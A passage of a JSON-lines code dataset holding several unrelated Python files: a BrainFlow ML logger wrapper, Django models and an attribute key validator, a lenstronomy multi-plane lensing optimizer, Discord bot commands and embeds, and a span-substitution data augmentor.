cls.set_log_level(LogLevels.LEVEL_INFO.value)\n\n @classmethod\n def disable_ml_logger(cls) -> None:\n \"\"\"disable BrainFlow Logger\"\"\"\n cls.set_log_level(LogLevels.LEVEL_OFF.value)\n\n @classmethod\n def enable_dev_ml_logger(cls) -> None:\n \"\"\"enable ML Logger with level TRACE, uses stderr for log messages by default\"\"\"\n cls.set_log_level(LogLevels.LEVEL_TRACE.value)\n\n @classmethod\n def set_log_file(cls, log_file: str) -> None:\n \"\"\"redirect logger from stderr to file, can be called any time\n\n :param log_file: log file name\n :type log_file: str\n \"\"\"\n try:\n file = log_file.encode()\n except BaseException:\n file = log_file\n res = MLModuleDLL.get_instance().set_log_file_ml_module(file)\n if res != BrainFlowExitCodes.STATUS_OK.value:\n raise BrainFlowError('unable to redirect logs to a file', res)\n\n @classmethod\n def log_message(cls, log_level: int, message: str) -> None:\n \"\"\"write your own log message to BrainFlow logger, use it if you wanna have single logger for your own code and BrainFlow's code\n\n :param log_level: log level\n :type log_file: int\n :param message: message\n :type message: str\n \"\"\"\n try:\n msg = message.encode()\n except BaseException:\n msg = message\n res = MLModuleDLL.get_instance().log_message_ml_module(log_level, msg)\n if res != BrainFlowExitCodes.STATUS_OK.value:\n raise BrainFlowError('unable to write log message', res)\n\n @classmethod\n def release_all(cls) -> None:\n \"\"\"release all classifiers\"\"\"\n\n res = MLModuleDLL.get_instance().release_all()\n if res != BrainFlowExitCodes.STATUS_OK.value:\n raise BrainFlowError('unable to release classifiers', res)\n\n @classmethod\n def get_version(cls) -> str:\n \"\"\"get version of brainflow libraries\n\n :return: version\n :rtype: str\n :raises BrainFlowError\n \"\"\"\n string = numpy.zeros(64).astype(numpy.ubyte)\n string_len = numpy.zeros(1).astype(numpy.int32)\n res = MLModuleDLL.get_instance().get_version_ml_module(string, string_len, 64)\n if res != BrainFlowExitCodes.STATUS_OK.value:\n raise BrainFlowError('unable to request info', res)\n return string.tobytes().decode('utf-8')[0:string_len[0]]\n\n def prepare(self) -> None:\n \"\"\"prepare classifier\"\"\"\n\n res = MLModuleDLL.get_instance().prepare(self.serialized_params)\n if res != BrainFlowExitCodes.STATUS_OK.value:\n raise BrainFlowError('unable to prepare classifier', res)\n\n def release(self) -> None:\n \"\"\"release classifier\"\"\"\n\n res = MLModuleDLL.get_instance().release(self.serialized_params)\n if res != BrainFlowExitCodes.STATUS_OK.value:\n raise BrainFlowError('unable to release classifier', res)\n\n def predict(self, data: NDArray) -> List:\n \"\"\"calculate metric from data\n\n :param data: input array\n :type data: NDArray\n :return: metric value\n :rtype: List\n \"\"\"\n output = numpy.zeros(self.model_params.max_array_size).astype(numpy.float64)\n output_len = numpy.zeros(1).astype(numpy.int32)\n res = MLModuleDLL.get_instance().predict(data, data.shape[0], output, output_len, self.serialized_params)\n if res != BrainFlowExitCodes.STATUS_OK.value:\n raise BrainFlowError('unable to calc metric', res)\n return output[0:output_len[0]]\n","repo_name":"brainflow-dev/brainflow","sub_path":"python_package/brainflow/ml_model.py","file_name":"ml_model.py","file_ext":"py","file_size_in_byte":9740,"program_lang":"python","lang":"en","doc_type":"code","stars":1088,"dataset":"github-code","pt":"44"} +{"seq_id":"3560796989","text":"from django.db import models\nfrom django.contrib.auth.models import AbstractUser\n\n# Create your models here.\nclass CustomUser(AbstractUser):\n is_student = models.BooleanField(default=False)\n is_candidate = models.BooleanField(default=False)\n\n username = None\n email = models.EmailField('email address', unique=True)\n\n name = models.CharField(max_length=50)\n USERNAME_FIELD = 'email'\n REQUIRED_FIELDS = ['name',]\n\nclass University(models.Model):\n\n class UniversityName(models.TextChoices):\n POLITECHNIKA_WROCLAW = 'PWR', 'Politechnika Wrocławska'\n POLITECHNIKA_WARSZAWA = 'PW', 'Politechnika Warszawska'\n POLITECHNIKA_SZCZECIN = 'ZUT', 'Zachodniopomorski Uniwersytet Technologiczny'\n\n class City(models.TextChoices):\n WARSZAWA = 'WAW', 'Warszawa'\n SZCZECIN = 'SZN', 'Szczecin'\n WROCLAW = 'WRO', 'Wrocław'\n\n name = models.CharField(max_length = 50)\n\n city = models.CharField(max_length = 20)\n\n description = models.TextField()\n\n def __str__(self):\n return self.name\n\nclass Student(models.Model):\n user = models.OneToOneField(CustomUser, on_delete=models.CASCADE, primary_key=True)\n university = models.ForeignKey(University, on_delete=models.PROTECT, null=True)\n\nclass Question(models.Model):\n class Category(models.TextChoices):\n REKRUTACJA = 'REK', 'Rekrutacja'\n INNE = 'INN', 'Inne' \n\n askedBy = models.ForeignKey(CustomUser, on_delete=models.SET_NULL, related_name='asked_questions', null=True)\n text = models.CharField(max_length=100)\n category = models.CharField(\n max_length=3,\n choices=Category.choices,\n default=Category.REKRUTACJA\n )\n createdAt = models.DateTimeField(auto_now_add=True)\n universities = models.ManyToManyField(University)\n price = models.FloatField(default=0.4)","repo_name":"LukaszKe/UniversityWithQuestions","sub_path":"system/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"7862402887","text":"from lenstronomy.LensModel.lens_model import LensModel\nimport numpy as np\n\n\nclass MultiPlaneLensing(object):\n\n _no_potential = True\n\n def __init__(self, full_lensmodel, x_pos, y_pos, lensmodel_params, z_source,\n z_macro, astropy_instance, macro_indicies, optimizer_kwargs, numerical_alpha_class,\n observed_convention_index=None):\n\n \"\"\"\n This class performs (fast) lensing computations for multi-plane lensing scenarios\n :param full_lensmodel:\n :param x_pos:\n :param y_pos:\n :param lensmodel_params:\n :param z_source:\n :param z_macro:\n :param astropy_instance:\n :param macro_indicies:\n \"\"\"\n\n self._z_macro, self._z_source = z_macro, z_source\n\n self._astropy_instance = astropy_instance\n\n self._x_pos, self._y_pos = np.array(x_pos), np.array(y_pos)\n self._nimg = len(x_pos)\n self._mag_idx = 0\n\n self._full_lensmodel, self._lensmodel_params = full_lensmodel, lensmodel_params\n\n self._T_z_source = full_lensmodel.lens_model._T_z_source\n\n self._observed_convention_index = observed_convention_index\n\n macromodel_lensmodel, macro_args, halo_lensmodel, halo_args = \\\n self._split_lensmodel(full_lensmodel,lensmodel_params,macro_indicies,numerical_alpha_class,\n observed_convention_index)\n self._macro_indicies = macro_indicies\n\n if 'precomputed_rays' in optimizer_kwargs:\n self._foreground = Foreground(halo_lensmodel, macromodel_lensmodel, self._z_macro, x_pos, y_pos,\n precompupted_rays=optimizer_kwargs['precomputed_rays'])\n else:\n self._foreground = Foreground(halo_lensmodel, macromodel_lensmodel, self._z_macro, x_pos, y_pos)\n\n self._halo_args = halo_args\n\n self._halo_lensmodel = halo_lensmodel\n self.multi_plane = False\n # this flag needs to be set as False to be compatible with the latest LensEquationSolver feature to make the\n # computation faster\n\n def set_static(self, kwargs):\n kwargs = self._full_lensmodel.set_static(kwargs)\n return kwargs\n\n def set_dynamic(self):\n self._full_lensmodel.set_dynamic()\n\n def ray_shooting(self, x, y, kwargs_lens, check_convention=True):\n\n if check_convention:\n kwargs_lens = self._set_kwargs(kwargs_lens)\n\n macromodel_args = []\n\n for ind in self._macro_indicies:\n macromodel_args.append(kwargs_lens[ind])\n\n # get the deflection angles from foreground and main lens plane subhalos (once)\n\n x, y, alphax, alphay = self._foreground.ray_shooting(self._halo_args, macromodel_args, thetax=x, thetay=y,\n force_compute=True)\n\n x_source, y_source, _, _ = self._full_lensmodel.lens_model.\\\n ray_shooting_partial(x, y, alphax, alphay, self._z_macro, self._z_source, kwargs_lens, check_convention=False)\n\n betax, betay = x_source * self._T_z_source ** -1, y_source * self._T_z_source ** -1\n\n return betax, betay\n\n def hessian(self, x, y, kwargs_lens, diff=0.00000001):\n\n kwargs_lens = self._set_kwargs(kwargs_lens)\n\n alpha_ra, alpha_dec = self._alpha(x, y, kwargs_lens, check_convention=False)\n\n alpha_ra_dx, alpha_dec_dx = self._alpha(x + diff, y, kwargs_lens, check_convention=False)\n alpha_ra_dy, alpha_dec_dy = self._alpha(x, y + diff, kwargs_lens, check_convention=False)\n\n dalpha_rara = (alpha_ra_dx - alpha_ra) * diff ** -1\n dalpha_radec = (alpha_ra_dy - alpha_ra) * diff ** -1\n dalpha_decra = (alpha_dec_dx - alpha_dec) * diff ** -1\n dalpha_decdec = (alpha_dec_dy - alpha_dec) * diff ** -1\n\n f_xx = dalpha_rara\n f_yy = dalpha_decdec\n f_xy = dalpha_radec\n f_yx = dalpha_decra\n\n return f_xx, f_xy, f_yx, f_yy\n\n def magnification(self,x,y,kwargs_lens):\n\n f_xx, f_xy, f_yx, f_yy = self.hessian(x,y,kwargs_lens)\n\n det_A = (1 - f_xx) * (1 - f_yy) - f_xy * f_yx\n\n return det_A**-1\n\n def _ray_shooting_fast(self, macromodel_args, offset_index=0, thetax=None, thetay=None,\n force_compute=False):\n\n # get the deflection angles from foreground and main lens plane subhalos (once)\n\n kwargs_lens = self._set_kwargs(macromodel_args + self._halo_args)\n\n x, y, alphax, alphay = self._foreground.ray_shooting(self._halo_args, macromodel_args, offset_index, thetax, thetay,\n force_compute=force_compute)\n\n x_source, y_source, _, _ = self._full_lensmodel.lens_model.ray_shooting_partial(x, y, alphax, alphay,\n self._z_macro, self._z_source, kwargs_lens, check_convention=False)\n\n betax, betay = x_source * self._T_z_source ** -1, y_source * self._T_z_source ** -1\n\n if offset_index == 0:\n self._beta_x_last, self._beta_y_last = betax, betay\n\n return betax, betay\n\n def _magnification_fast(self, macromodel_args):\n\n fxx,fxy,fyx,fyy = self._hessian_fast(macromodel_args)\n\n det_J = (1-fxx)*(1-fyy)-fyx*fxy\n\n return np.absolute(det_J**-1)\n\n def _hessian_fast(self, macromodel_args, diff=0.00000001):\n\n alpha_ra, alpha_dec = self._alpha_fast(self._x_pos, self._y_pos, macromodel_args)\n\n alpha_ra_dx, alpha_dec_dx = self._alpha_fast(self._x_pos + diff, self._y_pos, macromodel_args,\n offset_index=1)\n alpha_ra_dy, alpha_dec_dy = self._alpha_fast(self._x_pos, self._y_pos + diff, macromodel_args,\n offset_index=2)\n\n dalpha_rara = (alpha_ra_dx - alpha_ra) * diff ** -1\n dalpha_radec = (alpha_ra_dy - alpha_ra) * diff ** -1\n dalpha_decra = (alpha_dec_dx - alpha_dec) * diff ** -1\n dalpha_decdec = (alpha_dec_dy - alpha_dec) * diff ** -1\n\n f_xx = dalpha_rara\n f_yy = dalpha_decdec\n f_xy = dalpha_radec\n f_yx = dalpha_decra\n\n return f_xx, f_xy, f_yx, f_yy\n\n def _alpha_fast(self, x_pos, y_pos, macromodel_args, offset_index = 0):\n\n if offset_index == 0 and hasattr(self,'_beta_x_last'):\n return np.array(x_pos - self._beta_x_last), np.array(y_pos - self._beta_y_last)\n\n beta_x,beta_y = self._ray_shooting_fast(macromodel_args, offset_index=offset_index,\n thetax=x_pos, thetay=y_pos)\n\n alpha_x = np.array(x_pos - beta_x)\n alpha_y = np.array(y_pos - beta_y)\n\n return alpha_x, alpha_y\n\n def _alpha(self, x_pos, y_pos, kwargs_lens, check_convention=True):\n\n beta_x,beta_y = self.ray_shooting(x_pos, y_pos, kwargs_lens, check_convention)\n\n alpha_x = np.array(x_pos - beta_x)\n alpha_y = np.array(y_pos - beta_y)\n\n return alpha_x, alpha_y\n\n def _set_kwargs(self, kwargs_lens_full):\n\n if self._observed_convention_index is None:\n return kwargs_lens_full\n\n kwargs_physical = self._full_lensmodel.lens_model.observed2flat_convention(kwargs_lens_full)\n\n return kwargs_physical\n\n def _split_lensmodel(self, lensmodel, lensmodel_args, macro_indicies, numerical_alpha_class,\n observed_convention_inds):\n\n \"\"\"\n\n :param lensmodel: lensmodel to break up\n :param lensmodel_args: kwargs to break up\n :param z_break: the break redshift\n :param macro_indicies: the indicies of the macromodel in the lens model list\n :return: instances of LensModel for foreground, main lens plane and background halos, and the macromodel\n \"\"\"\n\n macro_names, macro_redshifts, macro_args = [], [], []\n\n halo_names, halo_redshifts, halo_args = [], [], []\n\n if observed_convention_inds is not None:\n convention_inds = []\n else:\n convention_inds = None\n\n count = 0\n\n for i in range(0, len(lensmodel.lens_model_list)):\n\n z = lensmodel.redshift_list[i]\n\n if i not in macro_indicies:\n\n halo_names.append(lensmodel.lens_model_list[i])\n halo_redshifts.append(z)\n halo_args.append(lensmodel_args[i])\n if observed_convention_inds is not None:\n if i in observed_convention_inds: convention_inds.append(count)\n count += 1\n\n else:\n\n macro_names.append(lensmodel.lens_model_list[i])\n macro_redshifts.append(z)\n macro_args.append(lensmodel_args[i])\n\n macromodel = LensModel(lens_model_list=macro_names, lens_redshift_list=macro_redshifts, cosmo=self._astropy_instance,\n multi_plane=True,\n z_source=self._z_source, numerical_alpha_class=numerical_alpha_class)\n\n halo_lensmodel = LensModel(lens_model_list=halo_names, lens_redshift_list=halo_redshifts,\n cosmo=self._astropy_instance, multi_plane=True, z_source=self._z_source,\n numerical_alpha_class = numerical_alpha_class, observed_convention_index=convention_inds)\n\n return macromodel, macro_args, halo_lensmodel, halo_args\n\n\nclass Foreground(object):\n\n def __init__(self, foreground_lensmodel, macromodel_lensmodel, z_to_vary, x_pos, y_pos, precompupted_rays = None):\n\n self._halos_lensmodel = foreground_lensmodel\n self._macromodel_lensmodel = macromodel_lensmodel\n self._z_to_vary = z_to_vary\n self._x_pos, self._y_pos = x_pos, y_pos\n\n dis = self._halos_lensmodel.lens_model._multi_plane_base._cosmo_bkg.T_xy\n if precompupted_rays is None:\n self._rays = [None] * 3\n else:\n self._rays = precompupted_rays\n\n self._Txy_main = dis(0, z_to_vary)\n z_source = self._halos_lensmodel.lens_model._z_source\n self._factor = dis(0, z_source) / dis(z_to_vary, z_source)\n\n def ray_shooting(self, args, macro_args, offset_index=None, thetax=None, thetay=None, force_compute=True):\n\n x, y, alphax, alphay = self._ray_shooting_cache(args, offset_index, thetax, thetay, force_compute)\n\n x, y, alphax, alphay = self._macromodel_lensmodel.lens_model.ray_shooting_partial(x, y, alphax, alphay,\n self._z_to_vary, self._z_to_vary, macro_args, include_z_start=True)\n\n return x, y, alphax, alphay\n\n def _ray_shooting_cache(self,args,offset_index=None,thetax=None,thetay=None,force_compute=True):\n\n if force_compute:\n\n x0, y0 = np.zeros_like(thetax), np.zeros_like(thetay)\n x, y, alphax, alphay = self._halos_lensmodel.lens_model.ray_shooting_partial(x0, y0, thetax, thetay,\n z_start=0,\n z_stop=self._z_to_vary,\n kwargs_lens=args)\n return x, y, alphax, alphay\n\n else:\n\n if self._rays[offset_index] is None:\n x0, y0 = np.zeros_like(self._x_pos), np.zeros_like(self._y_pos)\n\n if offset_index == 0:\n thetax, thetay = self._x_pos, self._y_pos\n\n x, y, alphax, alphay = self._halos_lensmodel.lens_model.ray_shooting_partial(x0, y0, thetax,\n thetay, z_start=0,\n z_stop=self._z_to_vary,\n kwargs_lens=args)\n\n self._rays[offset_index] = {'x': x, 'y': y, 'alphax': alphax, 'alphay': alphay}\n\n return self._rays[offset_index]['x'], self._rays[offset_index]['y'],\\\n self._rays[offset_index]['alphax'], self._rays[offset_index]['alphay']\n","repo_name":"franyancr/lenstronomy","sub_path":"lenstronomy/LensModel/Optimizer/multi_plane_optimizer.py","file_name":"multi_plane_optimizer.py","file_ext":"py","file_size_in_byte":12235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"44"} +{"seq_id":"28200704899","text":"import platform\n\nfrom nextcord import Embed, __version__ as dpy_v\nfrom nextcord.ext.commands import (\n Cog, command, cooldown,\n BucketType\n)\n\nfrom core.bot import MainBot\nfrom utils.checks import is_admin\nfrom utils import logging\n\nlogger = logging.get_logger(__name__)\n\n\nclass Admin(Cog):\n def __init__(self, bot: MainBot):\n self.bot = bot\n\n async def cog_check(self, ctx) -> bool:\n return await is_admin(ctx)\n\n @command(\n name=\"stats\", description=\"A useful command that displays bot statistics.\"\n )\n @cooldown(1, 3, BucketType.user)\n async def stats(self, ctx):\n \"\"\"\n A useful command that displays bot statistics.\n \"\"\"\n r = await self.bot.session.get(\n 'https://source.unsplash.com/random/?server,computer,internet')\n embed = Embed(\n title=f'{self.bot.user.name} Stats',\n description='\\uFEFF',\n colour=ctx.author.color,\n timestamp=ctx.message.created_at\n )\n\n embed.add_field(name='Bot Version:', value=self.bot.version)\n embed.add_field(name='Python Version:', value=platform.python_version())\n embed.add_field(name='nextcord.Py Version', value=dpy_v)\n embed.add_field(name='Total Guilds:', value=str(len(self.bot.guilds)))\n embed.add_field(name='Total Users:', value=str(len(set(self.bot.get_all_members()))))\n embed.add_field(name='Bot Developers:', value=f\"{self.bot.owner}\")\n embed.set_image(url=r.url)\n embed.set_author(name=ctx.author.name, icon_url=ctx.author.display_avatar.url)\n\n await ctx.reply(embed=embed)\n\n\ndef setup(bot):\n bot.add_cog(Admin(bot))\n","repo_name":"drlove2002/Basic-Discord-Private-Bot-Template","sub_path":"cogs/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"36885523227","text":"\n#import ac\n\nclass MovingAveragePlotter:\n def __init__(self, averagedOverNumPoints=5):\n self.averagedOverNumPoints = averagedOverNumPoints\n\n def averagePoint(self, averagedPoints, totals, counter):\n averagedPoints.append({\"x\": totals['x'] / counter, \"y\": totals['y'] / counter,\n \"z\": totals['z'] / counter})\n\n def plotMovingAverage(self, dataPoints):\n totals = {\"x\": 0, \"y\": 0, \"z\": 0}\n counter = 0\n previousPointIndex = 0\n\n numPoints = len(dataPoints)\n\n averagedPoints = []\n if(numPoints < self.averagedOverNumPoints):\n return averagedPoints\n\n for point in dataPoints:\n #ac.log(\"len={0}, previous={1}\".format(numPoints, previousPointIndex))\n if (counter >= self.averagedOverNumPoints):\n self.averagePoint(averagedPoints, totals, counter)\n if(previousPointIndexstruc_tuple (span_A and span_B are the same ALA they have the same struc)\n --value: a single int\n @exchange: dict\n --key1: encode(span)->encode(struc_tuple)\n --value: a singe int: also the encode of a type of spans\n\n @enc2type: dict, for `cogs`-type task only;\n --key1: enc(span)\n --value: type = 'span', 'lex', or 'tree'.\n\n [task: scan]\n \n @span_pool: list,[span_str1, span_str2,...]\n \n @inp_candidates: dict\n --key1: inp_idx\n\n @span_encodes: dict\n --key1: span's string(span_A and span_B are different)\n --value: a single int\n @exchange: dict\n --key1: encode(span)\n --value: a single int: also the encode of a type of spans\n '''\n self.span_pool = span_pool\n self.inp_cands = inp_candidates\n self.span_enc_dict = span_encodes\n self.exchanges = exchanges\n self.vocab = vocab\n self.enc2type = enc2type\n\n def get_span_encode(self, span, mode = 0):\n '''\n mode = 0: `scan`-style task, encode span to an int\n mode = 1: `cogs`-style task, encode struc to an int\n '''\n return self.span_enc_dict[span]\n\n def get_inp_candidates(self, inps, inp_ids, mode=0):\n '''\n inp.type = list, inp.'shape' = [bs, seq_len]\n mode = 0: each unique span as a singe candidate;\n mode = 1: span with the same tag would be treated as a single candidate;\n '''\n batch_cands_encode = list()\n batch_mask_indicat = list()\n inps_mask = list()\n inps_mask_cnt = list()\n inps_spans = list()\n\n if mode == 0:\n bs = len(inp_ids)\n for i in range(bs):\n inp = inps[i]\n\n inp_spans = list(self.inp_cands[inp_ids[i]])\n inps_spans.append(inp_spans)\n\n datum_cands_encode = list()\n\n for inp_span in inp_spans:\n inp_span_enc = self.get_span_encode(inp_span, mode = 0)\n # here we assume that inp_span_enc is a `int`-type data\n datum_cands_encode.append(inp_span_enc)\n batch_mask_indicat.append(len(datum_cands_encode))\n \n\n while len(datum_cands_encode) < FLAGS.fix_num_span:\n datum_cands_encode.append(PAD)\n\n batch_cands_encode.append(datum_cands_encode)\n '''\n e.g., batch_cands_encode is like : \n [\n [e11, e12, e13, ..., e17, PAD, PAD, PAD],\n [e21, e22, e23, ..., e26, PAD, PAD, PAD, PAD],\n ...,\n [e{bs,1}, e{bs,2},..., e{bs,9}, PAD]\n ]\n '''\n inp_mask,inp_mask_cnt = self.get_inp_masks(inp, inp_spans, mode=0)\n inps_mask_cnt.append(inp_mask_cnt)\n inps_mask.append(inp_mask)\n\n\n\n '''\n second: leverage function: `get_inp_masks` to get the mask vector\n indicating which tokens need to be subsed out for each inp.\n '''\n \n return batch_cands_encode, batch_mask_indicat, None, inps_mask, inps_spans, inps_mask_cnt\n \n elif mode == 1:\n '''\n span with the same tag would be treated as a single candidate;\n to do\n '''\n batch_reminder = list()\n bs = len(inp_ids)\n for i in range(bs):\n inp = inps[i]\n inp_spans = self.inp_candidates[inp_ids[i]]\n '''\n @inp_candidates: dict\n --key1: inp_idx\n --key2: span_type\n --key3: struc_type\n '''\n rand_val = random.random()\n\n while 1:\n if rand_val < FLAGS.p_tree2tree:\n if 'tree' not in inp_spans:\n continue\n inp_strucs = inp_spans['tree']\n reminder = 'tree2tree'\n break\n\n elif rand_val < FLAGS.p_lex2lex + FLAGS.p_tree2tree:\n if 'lex' not in inp_spans:\n continue\n inp_strucs = inp_spans['lex']\n reminder = 'lex2lex'\n break\n\n elif rand_val < FLAGS.p_span2span + FLAGS.p_lex2lex + FLAGS.p_tree2tree:\n if 'span' not in inp_spans:\n continue\n inp_strucs = inp_spans['span']\n reminder = 'span2span'\n break\n\n else:\n if 'lex' not in inp_spans:\n continue\n inp_strucs = inp_spans['lex']\n reminder = 'lex2span'\n break\n\n batch_reminder.append(reminder)\n # this reminder is to prompt which kind of struc need to be subsed in\n\n datum_cands_encode = list()\n \n\n sampled_inp_spans = self.sample_repre(inp_strucs, 1)\n inps_spans.append(sampled_inp_spans)\n\n # `sampled_inp_spans` here should be like `inp_spans` in the scan-style task\n inp_mask = self.get_inp_masks(inp, sampled_inp_spans, mode=1)\n inps_mask.append(inp_mask)\n\n for inp_struc in inp_strucs.keys():\n inp_struc_enc = self.get_span_encode(inp_struc, mode = 0)\n # here we assume that inp_span_enc is a `int`-type data\n datum_cands_encode.append(inp_struc_enc)\n\n batch_mask_indicat.append(FLAGS.fix_num_span - len(inp_struc_enc))\n \n\n while len(datum_cands_encode) < FLAGS.fix_num_span:\n datum_cands_encode.append(PAD)\n batch_cands_encode.append(datum_cands_encode)\n \n '''\n to do\n first: leverage function: `sample_repre` to sample the represents\n from each cluster;\n second: leverage function: `get_inp_masks` to get the mask vector\n indicating which tokens need to be subsed out for each inp.\n '''\n\n return batch_cands_encode, batch_mask_indicat, batch_reminder, inps_mask, inps_spans, None\n pass\n \n def sample_repre(self, cands=None, mode=1):\n '''\n only be used when dealing with `cogs`-style dataset.\n mode = 0: sample the representants from span_bool;\n mode = 1: sample the representants from inp_cands;\n cands are supposed to be like \n cands: dict\n ---key1: struc_type\n ---value: concrete span(str...)\n return:\n list: representatives for each type of struc\n '''\n pass\n \n def get_inp_masks(self, inp, span_cands, mode =0):\n '''\n get the mask vector indicating which ids of the inp are supposed\n to be subsed out\n e.g., \n `inp`: jump opposite right twice and look left thrice \n `span`: \n {\n jump opposite right, look left thrice, look, jump, right, left\n }\n `masks`:(all of the element are torch.tensors), shape[0] = fix_len_span;\n shape[1] = seq_len\n { \n [1,0,0,0,1,1,1,1,1,1],\n [1,1,1,1,1,1,0,0,0,1],\n [1,1,1,1,1,1,0,1,1,1],\n [1,0,1,1,1,1,1,1,1,1],\n [1,1,1,0,1,1,1,1,1,1],\n [1,1,1,1,1,1,1,0,1,1],\n PAD,\n PAD,\n ...,\n PAD\n }\n\n P.S.:\n mode = 0 : `scan`-style\n mode = 1 : `cogs`-style\n '''\n if mode == 0:\n inp_mask = list()\n inp_mask_cnt = list()\n # len(inp) = seq_len, \n # [, 3, 21, ..., 17, , , ]\n inp_ = list()\n for tok_enc in inp:\n inp_.append(self.vocab.decode_tok(tok_enc))\n inp_str = ' '.join(inp_)\n for cand in span_cands:\n cand_cnt = inp_str.count(cand)\n assert cand_cnt in [1,2]\n inp_mask_cnt.append(cand_cnt)\n\n tok_num = cand.count(' ')+1\n mask_rep = ''\n for i in range(tok_num-1):\n mask_rep = mask_rep+' '\n inp_str_r = inp_str.replace(cand, mask_rep)\n inp_li = inp_str_r.split(' ')\n mask = list()\n for i in range(len(inp_li)):\n if inp_li[i] == '':\n mask.append(0)\n else:\n mask.append(1)\n inp_mask.append(mask)\n \n pad = list()\n for i in range(len(inp)):\n pad.append(1)\n\n while len(inp_mask_cnt) < FLAGS.fix_num_span:\n inp_mask.append(pad)\n inp_mask_cnt.append(0)\n \n return inp_mask, inp_mask_cnt\n \n def get_cands_from_pool(self, out_spans, reminders=None, mode = 0):\n '''\n out_spans: list, len(out_spans) = bs\n e.g., out_spans = [3, 9, 19, 2, 28, 6, 4, ...]\n where `3(28)` may represent span_encodes['jump around right']\n mode = 0:for `scan`-type task\n mode = 1:for `cogs`-type task \n return: \n [\n 1:[span_encodes[key1],...,span_encodes[last_key]],\n 2:[],\n ...,\n bs:[]\n ]\n ***: we need to additionally record which value we would set to -inf;\n ***: for `cogs`-type task, we additionally need to record the representives;\n reminder: (only for `cogs`-type task) = ['span2span','lex2span',...],len=bs\n '''\n bs = len(out_spans)\n pool_cands=list()\n exchangeables = list()\n all_spans = list()\n if mode == 0:\n for span in self.span_pool:\n # span_pool = list[cand_str1,...]\n all_spans.append(self.get_span_encode(span, 0))\n # [encode(cand_str1),...]\n #sampled_repres = None\n\n elif mode == 1:\n strucs = dict()\n for key1 in self.span_pool:\n # first-layer key = span_type\n for key2 in self.span_pool[key1]:\n # second-layer key = (inp_node_type, out_node_type)\n for key3 in self.span_pool[key1][key2].keys():\n # third-layer key = struc_type\n all_spans.append(self.get_span_encode(key3, 1))\n assert key3 not in strucs\n # key3 are not supposed to already exist in strucs\n strucs[key3] = self.span_pool[key1][key2][key3]\n # a potential bug: is there arranged by order which I set?\n #sampled_repres = self.sample_repre(strucs, 0)\n #note, for each datum in a batch, we should resample repres for it.\n\n sampled_repres = list()\n # it is supposed to contain bs list, and each one of them are supposed\n # to be a repre_set\n for i in range(bs):\n out_span = out_spans[i]\n exchange = self.exchanges[out_span]\n # e.g. exchange = [3, 5, 8, 14, 41, 124, ...]\n \n if mode == 0:\n temp_exch = list()\n for j in range(len(all_spans)):\n if all_spans[j] in exchange:\n temp_exch.append(j)\n exchangeables.append(temp_exch)\n # only those appear in the exchangeable ids won't be set to -inf\n pool_cands.append(all_spans)\n\n elif mode == 1:\n reminder = reminders[i] # e.g.,'lex2span'\n out_span_type = self.enc2type[out_span] # e.g.,'lex'\n temp_exch = list()\n for j in range(len(all_spans)):\n if all_spans[j] in exchange:\n in_span_type = self.enc2type[all_spans[j]]\n if out_span_type+'2'+in_span_type == reminder:\n temp_exch.append(j)\n exchangeables.append(temp_exch)\n pool_cands.append(all_spans)\n sampled_repre = self.sample_repre(strucs, 0)\n sampled_repres.append(sampled_repre)\n\n return pool_cands, exchangeables, sampled_repres\n\n\n\ndef recombine_parse_scan():\n pass\n\ndef recombine_parse_cogs():\n pass","repo_name":"Joeylee-rio/Compgen_l2s2","sub_path":"learning-to-spansub/model/augmentor_utils.py","file_name":"augmentor_utils.py","file_ext":"py","file_size_in_byte":14090,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"69803200455","text":"from sellmo import modules\nfrom sellmo.contrib.attribute.types import AttributeType\n\nimport re\n\nfrom django.db import models\nfrom django.core.exceptions import ValidationError\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass AttributeKeyField(models.SlugField):\n\n def validate(self, value, instance):\n super(AttributeKeyField, self).validate(value, instance)\n key_regex = r'[a-z][a-z0-9_]*'\n if not re.match(key_regex, value):\n raise ValidationError(_(\"Must be all lower case, \"\n \"start with a letter, and contain \"\n \"only letters, numbers, or underscores.\"))\n if value in modules.product.reserved_url_params:\n raise ValidationError(_(\"Conflicts with url parameter\"))\n\n @staticmethod\n def create_key_from_name(name):\n\n name = name.strip().lower()\n\n # Change spaces to underscores\n name = '_'.join(name.split())\n\n # Remove non alphanumeric characters\n return re.sub('[^\\w]', '', name)\n\n\nclass AttributeTypeField(models.CharField):\n\n def validate(self, value, instance):\n super(AttributeTypeField, self).validate(value, instance)\n old = None\n\n if instance.pk:\n old = modules.attribute.Attribute.objects.get(pk=instance.pk)\n\n if not old or value == old.type:\n return\n\n if instance.values.count() > 0:\n raise ValidationError(\n _(\"Cannot change attribute type \"\n \"of an attribute that is already in use.\"))","repo_name":"leotop/django-sellmo","sub_path":"sellmo/contrib/attribute/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"21636200963","text":"import discord\n\nfrom config import *\n\n\nasync def model_info_embed(service: str, model: dict) -> discord.Embed:\n embed = discord.Embed(\n title=f\"Model data for {model['id']}\",\n description=f\"This includes the basic information about the model\",\n color=discord.Colour.blurple(),\n )\n embed.set_author(name=bot_name, icon_url=avatar_url)\n embed.set_thumbnail(url=f\"{icon_base_url}/{service}/{model['id']}\")\n embed.set_image(url=f\"{banner_base_url}/{service}/{model['id']}\")\n\n embed.add_field(name=\"First appeared\", value=model[\"indexed\"], inline=True)\n embed.add_field(name=\"Last update\", value=model[\"updated\"], inline=True)\n\n return embed\n\n\nasync def loading_more_embed() -> discord.Embed:\n embed = discord.Embed(\n title=\"Loading more pictures...\",\n description=\"Please wait while we load more pictures for you\",\n color=discord.Colour.blurple(),\n )\n embed.set_author(name=bot_name, icon_url=avatar_url)\n\n return embed\n\n\nasync def no_data_available_embed(name: str) -> discord.Embed:\n embed = discord.Embed(\n title=\"No data available\",\n description=f\"There is no data available for {name}\",\n color=discord.Colour.blurple(),\n )\n embed.set_author(name=bot_name, icon_url=avatar_url)\n\n return embed\n\n\nasync def unloading_results_embed() -> discord.Embed:\n embed = discord.Embed(\n title=\"Unloading results\",\n 